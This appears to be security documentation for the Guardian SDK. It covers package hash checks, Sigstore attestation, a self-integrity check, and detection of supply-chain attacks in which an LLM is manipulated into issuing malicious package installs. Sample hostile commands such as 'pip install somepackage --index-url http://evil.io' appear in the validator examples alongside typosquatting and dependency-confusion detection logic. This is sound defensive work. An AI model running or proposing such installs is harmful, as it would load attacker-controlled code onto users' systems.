This document explains how to verify the integrity of the Guardian SDK package and how to protect your codebase from supply chain / dependency injection attacks.
Before installing, confirm that the wheel hash matches the value published on PyPI.
```shell
# Download without installing
pip download ethicore-engine-guardian==2.6.0 --no-deps -d /tmp/guardian-dl

# Compute SHA-256 of the downloaded wheel
pip hash /tmp/guardian-dl/ethicore_engine_guardian-2.6.0-py3-none-any.whl
```

Compare the output against the hashes listed on the PyPI release page.
Add the `--require-hashes` flag to your `pip install` to enforce integrity on every dependency:

```text
# requirements.txt
ethicore-engine-guardian==2.6.0 \
    --hash=sha256:<paste hash from PyPI here>
```

```shell
pip install -r requirements.txt --require-hashes
```

This ensures pip will refuse to install any version of the package that does not match the expected hash, protecting against typosquatting, index substitution, and man-in-the-middle attacks on the package registry. Hash-checking mode applies to the whole file: every requirement in it, including transitive dependencies, must be pinned to an exact version and carry a hash, or pip refuses the install.
Starting with v2.6.0, the Guardian SDK includes a self-integrity CLI command:

```shell
# Verify your installed Guardian SDK
guardian verify

# Verbose: show per-file pass/fail
guardian verify --verbose

# Machine-readable output (CI pipelines)
guardian verify --json

# Strict mode: exits 1 if manifest is missing
guardian verify --strict
```

This checks SHA-256 hashes of all bundled Python and JSON files against the pre-computed baseline manifest shipped inside the wheel. If any file has been tampered with since the wheel was built, the mismatch is reported.
ONNX model files (licensed tier) are independently verified against `model_signatures.json`.
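To make the mechanism concrete, here is an added illustration of a manifest-based self-integrity check. This is example code, not the Guardian SDK's own implementation of `guardian verify`: it builds a baseline manifest of SHA-256 digests for every bundled `.py` and `.json` file, re-checks the installed tree against it (reporting modified, missing and unexpected files), and mirrors the warn/strict behaviour of `GUARDIAN_VERIFY_INTEGRITY`. The manifest layout, the `IntegrityResult` class and the function names are assumptions made for this example; the package tree in `demo()` is constructed inline.

```python
"""Added illustration of a manifest-based self-integrity check (example code,
not the Guardian SDK's implementation). Manifest layout, IntegrityResult and
function names are assumptions for this example."""
import hashlib
import json
import tempfile
import warnings
from dataclasses import asdict, dataclass, field
from pathlib import Path

VERIFIED_SUFFIXES = {".py", ".json"}
MANIFEST_NAME = "integrity_manifest.json"   # assumed name; excluded from its own listing


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large files never need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Baseline taken at build time: relative POSIX path -> hex digest."""
    files = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in VERIFIED_SUFFIXES and p.name != MANIFEST_NAME:
            files[p.relative_to(root).as_posix()] = sha256_file(p)
    return {"algorithm": "sha256", "files": files}


@dataclass
class IntegrityResult:
    passed: bool = True
    checked: int = 0
    mismatched: list = field(default_factory=list)
    missing: list = field(default_factory=list)
    unexpected: list = field(default_factory=list)

    @property
    def summary(self) -> str:
        return (f"{self.checked} checked, {len(self.mismatched)} mismatched, "
                f"{len(self.missing)} missing, {len(self.unexpected)} unexpected")

    def to_json(self) -> str:
        """Machine-readable form, the kind of output a --json flag would emit."""
        return json.dumps(asdict(self), sort_keys=True)


def check_integrity(root: Path, manifest: dict) -> IntegrityResult:
    """Compare the installed files with the baseline; any difference fails the check."""
    expected = manifest["files"]
    result = IntegrityResult()
    for rel, digest in expected.items():
        p = root / rel
        if not p.is_file():
            result.missing.append(rel)
            continue
        result.checked += 1
        if sha256_file(p) != digest:
            result.mismatched.append(rel)
    # A file absent from the manifest is also a finding: a module dropped into the
    # package directory can be imported by a tampered __init__.py.
    on_disk = build_manifest(root)["files"]
    result.unexpected = sorted(set(on_disk) - set(expected))
    result.passed = not (result.mismatched or result.missing or result.unexpected)
    return result


def verify_at_import(root: Path, manifest: dict, mode: str) -> IntegrityResult:
    """Mirror the two env-var modes: "1" warns on mismatch, "strict" raises."""
    result = check_integrity(root, manifest)
    if not result.passed:
        message = f"SDK integrity check failed: {result.summary}"
        if mode == "strict":
            raise RuntimeError(message)
        warnings.warn(message)
    return result


def demo() -> tuple:
    """Constructed scenario: take a baseline, then tamper with the installed tree."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "pkg").mkdir()
        (root / "pkg" / "__init__.py").write_text("VERSION = '2.6.0'\n")
        (root / "pkg" / "rules.json").write_text('{"rules": []}\n')
        manifest = build_manifest(root)
        clean = check_integrity(root, manifest)
        # Post-install tampering: one bundled file edited, one module dropped in.
        (root / "pkg" / "__init__.py").write_text("VERSION = '9.9.9'\n")
        (root / "pkg" / "extra.py").write_text("")
        tampered = check_integrity(root, manifest)
        try:
            verify_at_import(root, manifest, "strict")
            strict_raised = False
        except RuntimeError:
            strict_raised = True
        return clean, tampered, strict_raised


if __name__ == "__main__":
    clean, tampered, strict_raised = demo()
    print("clean:", clean.summary)
    print("tampered:", tampered.to_json())
    print("strict mode raised:", strict_raised)
```

The check treats unexpected files as failures, not only modified ones, because an attacker who can write into the package directory does not need to edit an existing file if a new module can be imported. Note that a manifest shipped inside the wheel only detects tampering that happened after the build; whether the build itself is trustworthy is what the Sigstore attestation below is for.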
Set the environment variable to run integrity verification at package import time:

```shell
# Warn on mismatch (recommended for most deployments)
export GUARDIAN_VERIFY_INTEGRITY=1

# Raise RuntimeError on mismatch (security-critical pipelines)
export GUARDIAN_VERIFY_INTEGRITY=strict
```

Or programmatically:
```python
from ethicore_guardian.integrity import verify_sdk_integrity

result = verify_sdk_integrity()
if not result.passed:
    raise RuntimeError(f"Guardian SDK integrity check failed: {result.summary}")
```

Guardian SDK wheels are signed using Sigstore via GitHub Actions on every release. To verify the attestation using the cosign tool:
```shell
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp "https://github.com/OraclesTech/guardian-sdk/.*" \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
  /tmp/guardian-dl/ethicore_engine_guardian-2.6.0-py3-none-any.whl
```

A successful verification confirms the wheel was built by the official CI pipeline and has not been tampered with since signing.
Configure pip to only install from approved sources:

```shell
# Allow only PyPI
pip config set global.index-url https://pypi.org/simple/
pip config set global.no-index-url ""
```

Or enforce this in `pip.conf` / `pip.ini` for your entire environment.
Run pip-audit to check your dependency tree for known vulnerabilities:

```shell
pip install pip-audit
pip-audit -r requirements.txt
```

Guardian SDK's CI pipeline runs pip-audit automatically on every build. You should run it in your own CI against your full dependency tree.
The `supplyChainDependencyInjection` threat category (added in the API tier, v2.6.0) detects when an LLM is being manipulated into generating malicious package installation instructions targeting your development workflow. This covers:

- Dependency confusion — attacker uploads a malicious package to PyPI using your private package's name, causing pip to install it instead of your internal version.
- Typosquatting — package name one character off from a trusted dependency.
- Index substitution — `--index-url` flag pointing to an attacker-controlled server.
- Backdoored version pinning — model instructed to pin a dependency to a vulnerable or backdoored release.
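As an added illustration of what detection logic for these four patterns looks like, the following checker takes a `pip install` command proposed by an LLM as a tool call and returns a verdict with the matched categories. This is example code, not the SDK's `ToolCallValidator`; the trusted-index hosts, trusted and private package names, the private index host `pypi.internal.example`, the denied release pin and the `Verdict`/`Match` structure are constructed policy values for this example.

```python
"""Added illustration of supply-chain tool-call validation (example code, not the
SDK's ToolCallValidator). All policy values below are constructed for the example."""
import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed policy values.
PRIVATE_INDEX_HOST = "pypi.internal.example"
TRUSTED_INDEX_HOSTS = {"pypi.org", "files.pythonhosted.org", PRIVATE_INDEX_HOST}
TRUSTED_PACKAGES = {"requests", "numpy", "ethicore-engine-guardian"}
PRIVATE_PACKAGES = {"acme-internal-auth"}      # exist only on the internal index
DENIED_PINS = {("requests", "2.0.0")}          # releases the security team has flagged


@dataclass
class Match:
    category: str
    description: str


@dataclass
class Verdict:
    verdict: str                               # "ALLOW" or "BLOCK"
    matches: list = field(default_factory=list)


def normalize(name: str) -> str:
    """PEP 503 normalisation so 'Requests' and 'requests_' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a distance of 1 is the 'one character off' case."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_requirement(req: str):
    """'pkg==1.2' -> ('pkg', '1.2'); unpinned or range specifiers -> (name, None)."""
    m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==\s*([^\s,;]+))?", req)
    if not m:
        return None, None
    return normalize(m.group(1)), m.group(3)


def validate_pip_install(cmd: str) -> Verdict:
    """Return BLOCK with one Match per finding, or ALLOW when nothing matched."""
    argv = shlex.split(cmd)
    if argv[:2] != ["pip", "install"]:
        return Verdict("ALLOW")                # other tools are out of scope here
    matches, requirements = [], []
    primary_host, extra_hosts = "pypi.org", []  # pip's default: PyPI only
    args, i = argv[2:], 0
    while i < len(args):
        arg = args[i]
        if arg in ("-i", "--index-url", "--extra-index-url") or \
                arg.startswith(("--index-url=", "--extra-index-url=")):
            if arg.startswith("--") and "=" in arg:
                flag, url = arg.split("=", 1)
            else:
                flag, url = arg, (args[i + 1] if i + 1 < len(args) else "")
                i += 1
            parsed = urlparse(url)
            host = parsed.hostname or ""
            if parsed.scheme != "https" or host not in TRUSTED_INDEX_HOSTS:
                matches.append(Match("index_substitution",
                                     f"{flag} points at untrusted index {url!r}"))
            if flag == "--extra-index-url":
                extra_hosts.append(host)
            else:
                primary_host = host
        elif not arg.startswith("-"):
            requirements.append(arg)
        i += 1
    for req in requirements:
        name, version = parse_requirement(req)
        if name is None:
            continue
        # Private name resolved against a public index, or against two indexes at
        # once (pip takes the highest version from either), is the confusion case.
        if name in PRIVATE_PACKAGES and (primary_host != PRIVATE_INDEX_HOST or extra_hosts):
            matches.append(Match("dependency_confusion",
                                 f"private package {name!r} would be resolved against a public index"))
        elif name not in TRUSTED_PACKAGES | PRIVATE_PACKAGES:
            near = sorted(t for t in TRUSTED_PACKAGES if edit_distance(name, t) == 1)
            if near:
                matches.append(Match("typosquatting",
                                     f"{name!r} is one edit away from trusted {near[0]!r}"))
        if version and (name, version) in DENIED_PINS:
            matches.append(Match("backdoored_pinning",
                                 f"{name}=={version} is a denied release"))
    return Verdict("BLOCK" if matches else "ALLOW", matches)


if __name__ == "__main__":
    for cmd in ("pip install requests==2.31.0",
                "pip install somepackage --index-url http://evil.io",
                "pip install requestz",
                "pip install acme-internal-auth",
                "pip install requests==2.0.0"):
        v = validate_pip_install(cmd)
        print(f"{v.verdict:5} {cmd}  {[m.category for m in v.matches]}")
```

The checker only sees the command string, so it belongs in front of the tool executor, where the page places `ToolCallValidator`; it is deliberately conservative (an unknown index host is a finding even when the scheme is HTTPS) because the cost of a false positive is one blocked tool call.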
Enable the check in your agentic pipeline:

```python
import openai
from ethicore_guardian import Guardian

guardian = Guardian(api_key="eg-sk-...")

# All tool calls and outputs are automatically scanned, including
# pip/npm install commands generated by the LLM.
protected_client = guardian.wrap(openai.OpenAI())
```

Or use `ToolCallValidator` directly before executing any package-manager tool:
```python
from ethicore_guardian.analyzers.tool_call_validator import ToolCallValidator

validator = ToolCallValidator()
result = validator.validate(
    "pip_install",
    {"cmd": "pip install somepackage --index-url http://evil.io"},
)
if result.verdict == "BLOCK":
    raise RuntimeError(f"Blocked malicious tool call: {result.matches[0].description}")
```

Please report security vulnerabilities to:
security@oraclestechnologies.com
Do not file public GitHub issues for security vulnerabilities. We will respond within 48 hours and coordinate a responsible disclosure timeline.
| Protection | Status |
|---|---|
| PyPI package hashes published | ✅ |
| Sigstore / SLSA attestations | ✅ |
| Hash-pinned requirements.lock | ✅ |
| Continuous pip-audit on wheel builds | ✅ |
| Typosquatting stubs on PyPI | ✅ (4 variants monitored) |
| SDK self-integrity check (guardian verify) | ✅ v2.6.0+ |
| AI-mediated supply chain detection | ✅ API tier v2.6.0+ |
Last updated: 2026-05-18 — Guardian SDK v2.6.0